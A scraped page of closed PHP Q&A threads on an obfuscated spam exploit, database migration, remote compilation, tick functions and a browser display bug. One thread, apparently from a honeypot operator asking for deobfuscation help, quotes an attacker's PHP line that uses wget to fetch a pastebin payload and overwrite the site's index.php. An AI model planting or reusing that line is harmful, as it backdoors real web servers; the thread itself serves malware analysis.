Weird exploit messing with email [closed] - php

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
Found a weird hack today someone was exploiting,
was wondering how this arbitary code could execute thousands of emails an hour.
http://pastebin.com/m7nBSmfB

There's nothing weird about the code you posted -- it builds up a PHP function in an obfuscated fashion -- then it calls the generated code.
The real problem/issue is, how is your server being made to run this code? If you have indeed been exploited by this, it's because you're allowing them to run arbitrary PHP code on your server.
You need to figure out how that happened.

Related

Changing database without changing the whole PHP code [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 10 hours ago.
This post was edited and submitted for review 9 hours ago.
Improve this question
I am exporting my system into a desktop app using PHP Desktop and MySQL. But in order to access it, I still have to start XAMPP.
So I am thinking of converting the database to SQLite.
My question is... Do I need to change my whole code like starting from the scratch or I just need to change the database connection?
Because I already build a GUI. And the only changes I want to make is the database.. I have seen some questions but it's not what I'm looking for.
Please guide me. I am new to this so Im sorry as I don't have enough knowledge in programming..
I haven't tried anything yet.
I am expecting to convert my database without changing the codes of my GUI and function buttons...

Deobfuscate this PHP shell attack [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of my honeypot systems has a pretty interesting PHP shell on it, i've been trying to decode it, but I'm not having any luck getting the contense of the gzinflated b64 encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfucsate it myself by printing variables in different places, but i can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ

remote web server compilation? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
So I'm kind of tossing an idea around in my head... is it feasible to write a webapp that asks for a user to input a snippet of code, and then compiles it remotely on a server, and returns the output back to the user?
feasible sure, you could definitely make this work from a technical point of view. but in terms of security, it sounds very dangerous.

is it possible to run a piece of external php code after each php statement? [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
The problem is that I must catch situation when some variable (and I don't know it's name, that is I don't know where this value first arises) matches some record in database. The way I think it could be done is to run after each statement an external code against array of local and remote variables. In that external code would be a simple foreach loop and db query, the script would then output line number where given situation happened.
Is this possible with xdebug ?
There is a function for that, http://php.net/manual/en/function.register-tick-function.php more documentation on ticks is http://www.php.net/manual/en/control-structures.declare.php here.

Strange webpage display [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I have made a webpage and doing testing in different browsers. In Chrome, everything is okay. But in IE, in some pages, at their ends, a few words are used to repeat themselves, far away.
When I use cursor to highlight the repeated words, the original words far away are also being highlighted.
May experts teach me what I have done wrong?
most probably its because of CSS file which you have made for all explorers the same. You will need to change the CSS file according to your browser.
If you have already done it then sample or image/code of your web page is required to find
the actual problem and then the solution.

Categories